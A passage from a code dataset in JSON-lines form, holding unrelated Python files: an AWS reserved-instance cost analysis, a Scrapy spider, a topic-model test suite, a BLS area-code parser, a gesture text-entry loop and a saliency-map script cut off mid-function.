'replay':replay}\n options = [\"replay\", \"reversed\", \"silent\"]\n arg = user_input.lower().split()\n silent = (True if 'silent' in arg else False)\n reverse = (True if 'reversed' in arg else False)\n h = r.history[::-1] if reverse else r.history\n new_args = list(filter(lambda x: x.isdigit() == False and '-' not in x, arg))\n for x in new_args:\n if x not in options:\n return f\"{r.name}: Sorry, I did not understand '{user_input}'.\", True\n ra = list(filter(lambda x: x.isdigit() or '-' in x, arg))\n if len(ra) == 1:\n ra = ra[0]\n if ra.isdigit():\n h = h[-int(ra):]\n else:\n ra = ra.split('-',1)\n r1, r2 = [x for x in ra]\n if r1.isdigit() and r2.isdigit():\n h = h[-int(r1): -int(r2)]\n else:\n return f\"{r.name}: Sorry, I did not understand '{user_input}'.\", True\n for i in h:\n user_input = cmd = i\n cmd = cmd.strip().lower().split()\n out = commands[cmd[0]](r, user_input)[0]\n if not silent:\n print(out)\n print(show_position(r))\n print(f' > HAL replayed {len(h)} commands'+(' in reverse' if reverse else '')+(' silently' if silent else '')+'.')\n return '', True\n\ndef set_up():\n screen.tracer(0)\n screen.delay(0)\n draw_screen()\n obs = maze.get_obstacles()\n for o in obs:\n draw_square(o[0], o[1])","sub_path":"world/turtle/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":5716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"553714830","text":"\"\"\"\nHere is the query in Athena that I used to produce the data\n\nQuery:\nSELECT\n lineitem_usageenddate AS UsageEndDate,\n product_instancetype AS InstanceType,\n lineitem_usagetype AS UsageType,\n SUM(CAST(lineitem_usageamount AS DOUBLE)) AS UsageAmount,\n SUM(CAST(lineitem_unblendedcost AS DOUBLE)) AS UnBlendedCost,\n lineitem_operation AS Operation,\n product_tenancy AS Tenancy,\n product_operatingsystem AS OperatingSystem,\n product_region AS Region\nFROM\n \"cz_live_billing_detailed\".\"342727989639\"\nWHERE\n from_iso8601_timestamp(lineitem_usageenddate) >= from_iso8601_timestamp('2018-10-01T00:00:00Z')\n AND from_iso8601_timestamp(lineitem_usageenddate) < from_iso8601_timestamp('2019-01-01T00:00:00Z')\n AND product_productname = 'Amazon Elastic Compute Cloud'\n AND lineitem_operation LIKE '%RunInstance%'\n AND LOWER(lineitem_usagetype) LIKE '%usage%'\n AND (lineitem_lineitemtype = 'Usage' OR lineitem_lineitemtype = 'DiscountedUsage')\nGROUP BY\n lineitem_usageenddate, product_region, product_instancetype, lineitem_usagetype, lineitem_operation, product_tenancy, product_operatingsystem\n\nHere is the link to the current EC2 pricing AWS posts:\nhttps://pricing.us-east-1.amazonaws.com/offers/v1.0/aws/AmazonEC2/current/index.csv\n\nMight want to look into exponentially weighted quantile regression to do time-based weighting\n\nA EC2 Reservation is made up of:\nRegion\nInstanceFamily\n[InstanceSize]\nTenancy\nOperating System\n----- AND -----\nReservation Length\nOffering Class (Convertible or Non Convertible)\nPurchaseOption (All Upfront, Partial Upfront, No Upfront)\n\n\n\"\"\"\n\nimport json\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nimport datetime as dt\n\n\nd_normalization = {'nano': 0.25,\n 'micro': 0.5,\n 'small': 1,\n 'medium': 2,\n 'large': 4,\n 'xlarge': 8,\n '2xlarge': 16,\n '4xlarge': 32,\n '8xlarge': 64,\n '9xlarge': 72,\n '10xlarge': 80,\n '12xlarge': 96,\n '16xlarge': 128,\n '18xlarge': 144,\n '24xlarge': 192,\n '32xlarge': 256}\nd_normalization_rev = {value: key for key, value in d_normalization.items()}\n\nd_regions = {'APN1': 'Asia Pacific (Tokyo)',\n 'APN2': 'Asia Pacific (Seoul)',\n 'APS1': 'Asia Pacific (Singapore)',\n 'APS2': 'Asia Pacific (Sydney)',\n 'APS3': 'Asia Pacific (Mumbai)',\n 'CAN1': 'Canada (Central)',\n 'EUC1': 'EU (Frankfurt)',\n 'EU': 'EU (Ireland)',\n 'EUW2': 'EU (London)',\n 'EUW3': 'EU (Paris)',\n 'SAE1': 'South America (Sao Paulo)',\n 'UGW1': 'AWS GovCloud (US-West)',\n 'USE1': 'US East (N. Virginia)',\n 'USE2': 'US East (Ohio)',\n 'USW1': 'US West (N. California)',\n 'USW2': 'US West (Oregon)'}\n\n# Missing Codes for d_regions:\n# AWS GovCloud (US)\n# EU (Stockholm)\n# AWS GovCloud (US-East)\n# Asia Pacific (Osaka-Local)\n\nd_regions_rev = {value: key for key, value in d_regions.items()}\n\nd_region_codes = {'us-east-1': 'USE1',\n 'us-east-2': 'USE2',\n 'us-west-1': 'USW1',\n 'us-west-2': 'USW2',\n 'ap-northeast-1': 'APN1',\n 'ap-southeast-2': 'APS2',\n 'ap-southeast-1': 'APS1',\n 'eu-west-1': 'EU',\n 'eu-central-1': 'EUC1',\n 'ca-central-1': 'CAN1'}\n\nd_os_trans = {'Linux/UNIX': '----',\n 'Linux/UNIX (Amazon VPC)': '----',\n 'Windows': '0002',\n 'Windows (Amazon VPC)': '0002',\n 'Red Hat Enterprise Linux (Amazon VPC)': '0010',\n 'Windows with SQL Server Standard (Amazon VPC)': '0006',\n 'Linux with SQL Server Standard (Amazon VPC)': '0004'}\nd_os_trans_rev = {value: key for key, value in d_os_trans.items()}\n\ns_month = '201810-201812'\ns_client_name = 'cengage'\ns_local_path = '/Users/strong/Dropbox (cloudzero)/CZResearch/czclients/' + s_client_name + '/ec2-usage/' + s_month + '/'\ns_filepath = s_local_path + s_client_name + '-ec2-usage-cost-' + s_month + '.csv'\ndf_data = pd.read_csv(s_filepath)\n\ns_res_path = '/Users/strong/Dropbox (cloudzero)/CZResearch/czclients/' + s_client_name + '/'\ns_ri_json = s_res_path + s_client_name + '_reserved_instances_20190117.json'\n\n# Get current reservation information\nwith open(s_ri_json, 'r') as f:\n ldf_ri = json.load(f)\n\nfor i, d_region_ris in enumerate(ldf_ri):\n if len(d_region_ris) == 0:\n continue\n s_region = d_region_ris['region']\n ld_region_ris = d_region_ris['data']['ReservedInstances']\n if i == 0:\n df_ri = pd.DataFrame(ld_region_ris)\n df_ri['RegionCode'] = s_region\n else:\n df_temp = pd.DataFrame(ld_region_ris)\n df_temp['RegionCode'] = s_region\n df_ri = df_ri.append(df_temp)\n\n# df_ri = pd.DataFrame(df_ri['ReservedInstances'])\ndf_ri['RecurringChargesAmount'] = df_ri['RecurringCharges'].apply(lambda x: x[0].get('Amount') if len(x) > 0 else np.nan)\ndf_ri['RecurringChargesFrequency'] = df_ri['RecurringCharges'].apply(lambda x: x[0].get('Frequency') if len(x) > 0 else np.nan)\n\ndf_ri.reset_index(inplace=True)\ndf_ri['RecurringChargesAmount'][np.logical_and(df_ri['RecurringChargesAmount'].isna(),\n df_ri['OfferingType'] == 'All Upfront')] = 0.0\ndf_ri['EffectiveHourlyRate'] = (df_ri['FixedPrice']/(df_ri['Duration']/3600) +\n df_ri['RecurringChargesAmount'])\n\ndf_ri['UnAccountedHourlyRate'] = df_ri['FixedPrice']/(df_ri['Duration']/3600)\ndf_ri['OperatingSystem'] = df_ri['ProductDescription'].apply(lambda x: d_os_trans.get(x, np.nan))\ndf_ri['InstanceFamily'] = df_ri['InstanceType'].apply(lambda x: x.split('.')[0])\n\n# This amount is what is spent no matter what is actually used\n# (i.e. it has already been spent at the beginning of the reservation)\ndf_ri['UnAccountedHourlySpend'] = df_ri['InstanceCount'] * df_ri['UnAccountedHourlyRate']\ndf_ri['NormalizationType'] = df_ri['InstanceType'].apply(lambda x: x.split('.')[-1])\ndf_ri['NormalizationFactor'] = df_ri['NormalizationType'].apply(lambda x:\n d_normalization.get(x, np.nan))\n\ndf_ri['Region'] = df_ri['RegionCode'].apply(lambda x: d_region_codes[x])\n\ndf_ri['Start'] = pd.to_datetime(df_ri['Start'])\ndf_ri['End'] = pd.to_datetime(df_ri['End'])\n\ndt_start = df_ri['Start'].min().to_pydatetime()\ndt_start = dt_start.replace(hour=0, minute=0, second=0, microsecond=0)\ndt_end = df_ri['End'].max().to_pydatetime()\n\ni_total_hours = int(np.ceil((dt_end - dt_start).total_seconds()/3600)) + 1\nldt_datetimes = [dt_start + dt.timedelta(hours=i) for i in range(i_total_hours)]\n\ndf_tracker = pd.DataFrame(index=ldt_datetimes, columns=df_ri['ReservedInstancesId'].unique())\nls_ri_ids = df_ri['ReservedInstancesId'].unique()\ndf_ri.set_index('ReservedInstancesId', inplace=True)\n\nfor i, s_ri_id in enumerate(df_tracker.columns):\n df_tracker[s_ri_id][df_ri.iloc[i]['Start']:df_ri.iloc[i]['End']] = 1\n\ndf_tracker = (df_ri['EffectiveHourlyRate'] * df_ri['InstanceCount']) * df_tracker\n\n# Process EC2 Pricing Data\ns_ec2_pricing_path = 'aws_ec2_pricing.csv'\ndf_pricing = pd.read_csv(s_ec2_pricing_path, header=5)\ndf_pricing = df_pricing[~df_pricing['operation'].isna()]\ndf_pricing = df_pricing[~df_pricing['Instance Type'].isna()]\ndf_pricing = df_pricing[df_pricing['operation'].str.startswith('RunInstances')]\ndf_pricing['OperatingSystem'] = df_pricing['operation'].str.split(':').apply(lambda x:\n x[1] if len(x) > 1 else '----')\ndf_pricing['Region'] = df_pricing['Location'].apply(lambda x: d_regions_rev.get(x, 'unknown'))\ndf_pricing['InstanceFamily'] = df_pricing['Instance Type'].str.split('.').apply(lambda x: x[0])\ndf_pricing['InstanceSize'] = df_pricing['Instance Type'].str.split('.').apply(lambda x: x[1] if len(x) > 1\n else 'small')\ndf_pricing['NormalizationFactor'] = df_pricing['InstanceSize'].apply(lambda x:\n d_normalization.get(x, np.nan))\ndf_ondemand = df_pricing[df_pricing['TermType'] == 'OnDemand']\ndf_reserved = df_pricing[df_pricing['TermType'] == 'Reserved']\n\ndf_ondemand = df_ondemand[~df_ondemand['usageType'].str.contains('Reservation')]\ndf_ondemand = df_ondemand[~df_ondemand['usageType'].str.contains('Unused')]\n\n# Set the index to the 5 attributes that make up a reservation\ndf_reserved = df_reserved.set_index(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy', 'OperatingSystem'])\ndf_ondemand = df_ondemand.set_index(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy', 'OperatingSystem'])\n\ndf_usage = df_data[df_data['UsageType'].str.lower().str.contains('usage')]\n\ndf_usage['UsageEndDate'] = pd.to_datetime(df_usage['UsageEndDate'])\n\ndt_start_usage = df_usage['UsageEndDate'].min().to_pydatetime()\ndt_end_usage = df_usage['UsageEndDate'].max().to_pydatetime()\n\nf_total_ri_costs = df_tracker.ix[dt_start_usage:dt_end_usage].sum().sum()\n\ndf_usage['Region'] = df_usage['UsageType'].str.split('-').apply(lambda x: x[0] if len(x) > 1 else 'USE1')\ndf_usage['InstanceFamily'] = df_usage['UsageType'].str.split(':').apply(lambda x: x[1].split('.')[0] if len(x) > 1\n else 'm1')\ndf_usage['InstanceSize'] = df_usage['UsageType'].str.split(':').apply(lambda x: x[1].split('.')[1] if len(x) > 1\n else 'small')\ndf_usage['OperatingSystem'] = df_usage['Operation'].str.split(':').apply(lambda x: x[1] if len(x) > 1 else '----')\n\ndf_usage['NormalizationFactor'] = df_usage['InstanceSize'].apply(lambda x:\n d_normalization.get(x, np.nan))\ndf_usage['NormalizedUsage'] = df_usage['UsageAmount'] * df_usage['NormalizationFactor']\n\n# Any un-specified tenancy we assume is shared\ndf_usage['Tenancy'].fillna('Shared', inplace=True)\n\ndf_usage['date'] = df_usage['UsageEndDate'].dt.date\ndf_usage['hour'] = df_usage['UsageEndDate'].dt.hour\n\nf_total_cost_spot = df_usage[df_usage['OperatingSystem'].str.startswith('SV')]['UnBlendedCost'].sum()\n\ndf_summed_usage = df_usage.groupby(['Region', 'InstanceFamily', 'InstanceSize',\n 'Tenancy', 'OperatingSystem', 'date', 'hour'])['NormalizedUsage'].sum()\ndf_summed_usage = df_summed_usage.reset_index()\n\ngrouper = df_summed_usage.groupby(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy', 'OperatingSystem'])\nlt_groups = list(grouper.groups.keys())\n\nna_dates = np.sort(df_summed_usage['date'].unique())\nna_hours = np.tile(np.arange(24), len(na_dates))\nna_dates = na_dates.repeat(24)\nna_data = np.vstack((na_dates, na_hours)).T\n\nfor i, t_group in enumerate(lt_groups):\n if i == 0:\n df_zeros = pd.DataFrame(data=na_data, columns=['date', 'hour'])\n df_zeros['Region'] = t_group[0]\n df_zeros['InstanceFamily'] = t_group[1]\n df_zeros['InstanceSize'] = t_group[2]\n df_zeros['Tenancy'] = t_group[3]\n df_zeros['OperatingSystem'] = t_group[4]\n df_zeros['NormalizedUsage'] = 0.0\n else:\n df_temp = pd.DataFrame(data=na_data, columns=['date', 'hour'])\n df_temp['Region'] = t_group[0]\n df_temp['InstanceFamily'] = t_group[1]\n df_temp['InstanceSize'] = t_group[2]\n df_temp['Tenancy'] = t_group[3]\n df_temp['OperatingSystem'] = t_group[4]\n df_temp['NormalizedUsage'] = 0.0\n df_zeros = df_zeros.append(df_temp)\n\ndf_summed_usage = (df_zeros.set_index(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy',\n 'OperatingSystem', 'date', 'hour']) +\n df_summed_usage.set_index(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy',\n 'OperatingSystem', 'date', 'hour']))\ndf_summed_usage.fillna(0.0, inplace=True)\ndf_summed_usage = df_summed_usage.reset_index()\n\n# Iterate through usage that must be allocated to specifically sized RIs\nf_total_od_costs = 0.0\nfor name, group in df_summed_usage.groupby(['Region', 'InstanceFamily', 'InstanceSize', 'Tenancy',\n 'OperatingSystem']):\n if name[4].startswith('SV'):\n # This is a spot instance and will be added to the total cost later.\n continue\n\n df_od_options = df_ondemand.loc[name]\n\n i_instance_size = d_normalization[name[2]]\n\n i_loc_od = np.where(df_od_options['NormalizationFactor'] == i_instance_size)[0][0]\n f_hourly_cost_od = df_od_options.iloc[i_loc_od]['PricePerUnit']\n\n f_total_usage_hours = (group['NormalizedUsage']/float(i_instance_size)).sum()\n f_total_group_cost_od = f_total_usage_hours * f_hourly_cost_od\n f_total_od_costs += f_total_group_cost_od\n\nf_total_current_cost = df_usage['UnBlendedCost'].sum() + f_total_ri_costs\nf_total_all_od_cost = f_total_od_costs + f_total_cost_spot\nprint('EC2 Usage: Total Current Costs from', dt_start_usage, 'to', dt_end_usage, ':', f_total_current_cost)\nprint('EC2 Usage: Total Costs if all On Demand from', dt_start_usage, 'to', dt_end_usage, ':', f_total_all_od_cost)\nprint('Reserved Instance savings rate:', 1 - (f_total_current_cost/f_total_all_od_cost))\nii = 20\n","sub_path":"ri_performance.py","file_name":"ri_performance.py","file_ext":"py","file_size_in_byte":13675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"283672560","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n\nclass Spider3Spider(CrawlSpider):\n name = 'spider3'\n allowed_domains = ['tieba.baidu.com']\n start_urls = ['http://tieba.baidu.com/']\n\n\n #定义提取url规则\n rules = (\n Rule(LinkExtractor(allow=r'Items/'), callback='parse_item'), #还有其他参数,正则匹配当前页所有url follow表示是否循环匹配\n Rule(LinkExtractor(allow=r'Items/'), follow=True), #循环执行\n # Rule(LinkExtractor(restrict_xpaths=r'//div'), follow=True), #查找符合区域的所有url\n )\n\n def parse_item(self, response):\n item = {}\n #item['domain_id'] = response.xpath('//input[@id=\"sid\"]/@value').get()\n #item['name'] = response.xpath('//div[@id=\"name\"]').get()\n #item['description'] = response.xpath('//div[@id=\"description\"]').get()\n return item\n","sub_path":"python_spider_example/spider1/myspider1/myspider1/spiders/spider3.py","file_name":"spider3.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"475999934","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\nreadme = open('README.md').read()\nsetup(name='pyharmony',\n version='1.0',\n description='Python API for Logitech Harmony Hub',\n author='Jeff Terrace',\n author_email='jterrace@gmail.com',\n url='http://www.github.com/zonyl/pyharmony',\n packages=find_packages())\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"124032853","text":"import read_serial\nimport oscilloscope\nimport keyboard\nimport panel\nimport pygame\nimport entry\nimport time\nimport math\nimport event\nimport log\n\nlog = log.Log()\nentry = entry.Entry(5000, entry.LanguageModel.USE_TRIGRAMS)\ninput = read_serial.ReadSerial()\ninput.get_data()\npan = panel.Panel(entry)\nlog.start_phrase(pan.text_task)\nprint( 'Trial', pan.phrase_cnt, 'begin.' )\n\npitchs = []\nheadings = []\nevent = event.Event()\n\ndef clear():\n global pitchs\n global headings\n global pan\n global down_pitch\n global down_heading\n pitchs = []\n headings = []\n pan.clear_candidates_bar()\n pan.update_visual_row(None)\n\nT = 0\n\nwhile True:\n T += 1\n if T % 10 == 0 and (keyboard.is_pressed('q') or pan.phrase_cnt == 10):\n break\n if T % 10 == 5 and len(pan.text_inputed) > 0:\n if keyboard.is_pressed('y'): # Next phrase\n log.end_phrase(True)\n pan.next_phrase()\n log.start_phrase(pan.text_task)\n clear()\n print( 'Trial', pan.phrase_cnt, 'begin.' )\n elif keyboard.is_pressed('n'): # Redo the phrase\n log.end_phrase(False)\n pan.redo_phrase()\n log.start_phrase(pan.text_task)\n clear()\n data = input.get_data() # [t, gx, gy, gz, ax, ay, az, gra_x, gra_y, gra_z, pitch, heading, is_touch]\n log.log_raw_data(data)\n\n timestamp = data[0]\n pitch = data[10]\n heading = data[11]\n\n curr_event = event.get_event(data)\n if curr_event == event.SLIDE_LEFT: # Deletion\n if len(pitchs) == 0: # Delete a word\n pan.text_delete_word()\n log.delete_a_word()\n else: # Delete letters\n log.delete_letters()\n clear()\n\n if len(pan.candidates) >= 1 and pan.selecting == None and curr_event == event.LONG_PRESS: # Trigger Selection\n pan.start_selection(heading, pitch)\n \n if pan.selecting != None:\n pan.update_selection(heading, pitch)\n \n if curr_event == event.TOUCH_DOWN:\n down_pitch = pitch\n down_heading = heading\n \n if curr_event == event.TOUCH_UP: # Confirm\n if pan.selecting == None: # Typing\n # pan.update_visual_row(down_pitch) # Visual feedback\n pitchs.append(down_pitch)\n headings.append(down_heading)\n candidates = entry.predict(pitchs, headings)\n pan.update_candidates(candidates)\n log.entry_a_letter(down_pitch, down_heading)\n else: # Selection\n word = pan.get_selecting_candidate()\n pan.text_add_word(word)\n clear()\n if word == '':\n log.delete_letters()\n else:\n log.entry_a_word(word)\n\npan.stop()\ntime.sleep(1)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532332198","text":"import pprint\nfrom nose.tools import assert_equal\nfrom nose.tools import assert_not_equal\nfrom patterny.config import Config\nfrom patterny.ml.tmodel import TopicModel\nfrom utils import OVERLAP_CONFIG_FILE, MODELS_FOLDER\n\n\nDATA = [\n # D0 - T1\n \"\"\"\n If you are navigating through the list of open tabs inside the All+Tabs panel and you wanna filter by a term you have to select the search text field first.\n It would be nice if any entered character is automatically routed to the search field and the filter gets applied.\n \"\"\",\n # D1 - T1\n \"\"\"\n In maximized mode there is something like 3 pixels padding on the right side of \"All tabs\" panel.\n It doesn't exist on the left side of panel and in not maximized mode.\n \"\"\",\n # D2 - T1\n \"\"\"\n When you have the All+Tabs panel open it would be great if you can press Cmd/Ctrl+F to focus the search text field. Right now the panel gets hidden and the Find toolbar is shown without focus.\n IMO using the command inside the All+Tabs panel would make more sense.\n \"\"\",\n # D3 - T2\n \"\"\"\n Steps to reproduce:\n Nothing... had multiple windows and tiles open... for about 4 hours\n\n Actual results:\n Crashed without warning\n \"\"\",\n # D4 - T0\n \"\"\"\n Firefox crashes at leat 6 times a day. Installed latest version but still crashing. Goes very slow before it crashes.\n \"\"\",\n # D5 - T0\n \"\"\"\n Steps to reproduce:\n W have installed Firefox 18 (as we did with all previous version) on Solaris 10 SPAC 64b\n\n Actual results:\n When we tried to start it form a console, it crashed with a message: Segmentation fault.\n And it produced a core dump\n\n Expected results:\n Firefox should have open correctly\n \"\"\",\n # D6 - T3\n \"\"\"\n screen shots: Aurora 7.0a2 top, FF 3.6.18 bottom\n\n User Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:7.0a2) Gecko/20110709 Firefox/7.0a2\n Build ID: 20110709042004\n\n Steps to reproduce:\n\n Start Aurora with a new Profile just to be sure\n Open Menu Preferences\n Select Advanced | Encryption , View Certificates\n Select tab certificates, scroll down to Thawte\n Select first Thawte Certificate, click \"view...\" button\n\n (Actually the problem is not specific to this single certificate. I tried many more built-in root certificates and they all had the same issue.)\n\n\n\n Actual results:\n\n Certificate Viewer opens, it says \"could not verify this certificate for unknown reasons\"\n\n\n Expected results:\n\n Certificate Viewer opens, it should say \"this certificates has been verified for the following uses\" and a list of uses.\n \"\"\",\n # D7 - None (for 4 topics, probs = [0.25, 0.25, 0.25, 0.25])\n \"\"\"\n I agree with the utility of this feature it's just going to take some serious work. This is a pretty hacky area of the code that is screaming for a rewrite.\n\n I'll slate this for 1.1\n \"\"\"\n]\n\n\nclass TestTopicModel(object):\n def setup(self):\n self.pp = pprint.PrettyPrinter(indent=2)\n with open(OVERLAP_CONFIG_FILE) as f:\n self.config = Config(f)\n\n def teardown(self):\n pass\n\n def test_build_sample_data(self):\n n_topics = 4\n n_top_words = 5\n tmodel = TopicModel(n_samples=10, n_features=20, n_topics=n_topics, n_top_words=n_top_words)\n tmodel.build(DATA, debug=True)\n\n assert_not_equal(tmodel.topics, None)\n assert_not_equal(tmodel.topics.keys(), None)\n assert_not_equal(len(tmodel.topics.keys()), 0)\n assert_equal(len(tmodel.topics.keys()), n_topics)\n\n for topic_idx, topic in tmodel.topics.iteritems():\n assert_equal(len(topic.topic_overview), n_top_words)\n\n def test_save_load_model(self):\n n_topics = 4\n n_top_words = 5\n tmodel = TopicModel(n_samples=10, n_features=20, n_topics=n_topics, n_top_words=n_top_words)\n tmodel.build(DATA, debug=True)\n tmodel.save(MODELS_FOLDER)\n\n new_tmodel = TopicModel(n_samples=10, n_features=20, n_topics=n_topics, n_top_words=n_top_words)\n new_tmodel.load(MODELS_FOLDER)\n\n assert_not_equal(new_tmodel.topics, None)\n assert_not_equal(new_tmodel.topics.keys(), None)\n assert_not_equal(len(new_tmodel.topics.keys()), 0)\n assert_equal(len(new_tmodel.topics.keys()), n_topics)\n\n for topic_idx, topic in new_tmodel.topics.iteritems():\n assert_equal(len(topic.topic_overview), n_top_words)\n","sub_path":"patterny/tests/test_ml_tmodel.py","file_name":"test_ml_tmodel.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532484470","text":"import time\r\n\r\nmy_list = [0, 5, 2, 4, 7, 1, 3, 19]\r\n\r\nnechet_list = (list(filter(\r\n lambda x: x % 2 == 1,\r\n my_list\r\n)))\r\nprint(len(nechet_list))\r\n\r\ncounter = 0\r\n\r\nwhile True:\r\n print(1)\r\n time.sleep(5)\r\n\r\nfor item in my_list:\r\n if item % 2 == 1:\r\n counter += 1\r\nprint(counter)","sub_path":"HW_Start_5/HW5_5.py","file_name":"HW5_5.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"644926601","text":"import pandas as pd\nimport requests as r\nfrom db_layer import sql_caller\n\nurl = 'https://download.bls.gov/pub/time.series/la/la.area'\ndelimeter = '\\t'\nseries_id_len = 20\ndata = r.get(url)\n\nrow_list = []\n\ncount = 0\nfor line in data.text.splitlines():\n if count is 0:\n headers = [x.strip() for x in line.split(delimeter)]\n count += 1\n else:\n row = [x.strip() for x in line.split(delimeter, maxsplit=len(headers) - 1)]\n\n # make sure we only look at MSAs\n if row[0] not in ['A','D','B', 'F']:\n continue\n\n if len(row) > series_id_len:\n print('seriesid length is greater than {}'.format(series_id_len))\n continue\n\n if len(row) < len(headers):\n row.append('n/a')\n row_list.append(row)\n else:\n row_list.append(row)\n count += 1\n\ndf = pd.DataFrame(row_list, columns=headers)\n\nfor i, row in df.iterrows():\n if row['area_type_code'] == 'A':\n if row['area_code'][2:4] == '72':\n df.drop(i, inplace=True)\n continue\n df.at[i, 'Geo_ID'] = row['area_code'][2:4]\n df.at[i, 'Geo_Type'] = 'States'\n\n elif row['area_type_code'] == 'B':\n if row['area_code'][2:4] == '72':\n df.drop(i, inplace=True)\n continue\n df.at[i, 'Geo_ID'] = row['area_code'][4:9]\n df.at[i, 'Geo_Type'] = 'Metro'\n\n elif row['area_type_code'] == 'D':\n if row['area_code'][2:4] == '72':\n df.drop(i, inplace=True)\n continue\n df.at[i, 'Geo_ID'] = row['area_code'][4:9]\n df.at[i, 'Geo_Type'] = 'Micro'\n\n elif row['area_type_code'] == 'F':\n if row['area_code'][2:4] == '72':\n df.drop(i, inplace=True)\n continue\n df.at[i, 'Geo_ID'] = row['area_code'][2:7]\n df.at[i, 'Geo_Type'] = 'County'\n\nMSA_to_CBSA_conversion = {\n '70750':'12620','70900':'12700','71050':'12740','71350':'13540','71500':'13620','71650':'14460','71950':'14860','72400':'15540','72700':'18180',\n '19380':'19430','73450':'25540','73750':'28300','73900':'29060','74350':'30100','74650':'30340','74950':'31700','75700':'35300','76450':'35980',\n '36860':'36837','76600':'38340','76750':'38860','39140':'39150','77200':'39300','77650':'40860','78100':'44140','78400':'45860','78500':'47240',\n '11680':'49060','79600':'49340'}\n\nfor k,v in MSA_to_CBSA_conversion.items():\n if k in list(df['Geo_ID']):\n df.loc[df['Geo_ID'] == k, 'Geo_ID'] = v\n\n\n\ndf.to_excel('Geo names.xlsx')","sub_path":"unemployment_parser/get_msa_names.py","file_name":"get_msa_names.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"51419839","text":"from itertools import islice\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\n\n\ndef node_iterator(root):\n \"\"\"\n Enumerate UAST nodes using depth-first approach.\n \"\"\"\n queue = [(root, 0)]\n n_nodes = 1\n while queue:\n node, node_idx = queue.pop()\n yield node, node_idx\n for child in node.children:\n queue.append((child, n_nodes))\n n_nodes += 1\n\n\ndef read_embeddings(emb_path: str) -> Tuple[Dict[str, np.array], List[str]]:\n emb = {}\n roles = []\n\n with open(emb_path) as fin:\n for line in fin:\n word, *vec = line.split(\"\\t\")\n emb[word] = np.array(vec, dtype=np.float)\n if word.startswith(\"RoleId_\"):\n roles.append(word)\n\n roles = {role: i for i, role in enumerate(roles)}\n return emb, roles\n\n\ndef read_paths(fname: str) -> List[str]:\n with open(fname) as fin:\n paths = [line.strip() for line in fin.readlines()]\n if not paths:\n raise ValueError(\"Make sure the file is not empty!\")\n return paths\n\n\ndef read_vocab(vocab_path: str, num_words: int=None) -> List[str]:\n with open(vocab_path) as fin:\n words = [line.split(\" \")[0] for line in islice(fin, num_words)]\n return words\n\n\ndef save_vocab(vocab_path: str, vocab: Dict[str, int]) -> None:\n with open(vocab_path, \"w\") as fout:\n fout.write(\"\\n\".join(map(lambda x: \"%s %d\" % x, vocab.most_common())))\n","sub_path":"role2vec/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"543306397","text":"import sys\nimport os\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport Model\nfrom lime import lime_image\nimport skimage.color as color\nfrom skimage.segmentation import slic\nREPORT_MODE = False#True\ndef parse_csv(label_path):\n raw_data_fp = open(label_path,'r')\n lines = raw_data_fp.readlines()[1:]\n num_data = len(lines)\n\n raw_imgs = np.empty(shape=(num_data,1,48*48), dtype=float)\n raw_y = np.zeros(shape=(num_data),dtype=np.int64)\n for i, line in enumerate(lines):\n nums = line.split(',')\n raw_y[i] = int(nums[0])\n raw_imgs[i,:,:] = np.array([float(num) for num in nums[1].split(' ')]) /255.0\n raw_imgs = raw_imgs.reshape((num_data,1,48,48))\n \n return raw_imgs, raw_y\n\ndef show_saliency_maps(x, y, model):\n x_org = x.squeeze().numpy()\n # Compute saliency maps for images in X\n saliency = compute_saliency_maps(x, y, model)\n\n # Convert the saliency map from Torch Tensor to numpy array and show images\n # and saliency maps together.\n saliency = saliency.detach().cpu().numpy()\n \n num_pics = x_org.shape[0]\n \n for i in range(num_pics):\n # You need to save as the correct fig names\n #plt.imsave('p3/pic_L'+str(int(y[i]))+'_i'+ str(i+offset)+'.png', x_org[i], cmap=plt.cm.gray)\n #plt.imsave('p3/pic_L'+str(int(y[i]))+'_i'+ str(i+offset)+'s.png', saliency[i], cmap=plt.cm.jet)\n if REPORT_MODE:\n plt.suptitle('Original / Saliency Map / Mask')\n ax = plt.subplot(1, 3, 1)\n plt.imshow(x_org[i], cmap=plt.cm.gray)\n plt.axis('off')\n \n ax = plt.subplot(1, 3, 2)\n im = plt.imshow(saliency[i], cmap=plt.cm.jet)\n plt.axis('off')\n #plt.axis('off')\n ax = plt.subplot(1, 3, 3)\n e_max = np.amax(saliency[i])\n e_min = np.amin(saliency[i])\n thres = (e_max-e_min) / 6\n img3 = x_org[i] * (saliency[i] > thres) + (saliency[i] <= thres) * 0.1\n plt.axis('off')\n plt.imshow(img3, cmap=plt.cm.gray)\n #cax = divider.append_axes(\"right\", size=\"5%\", 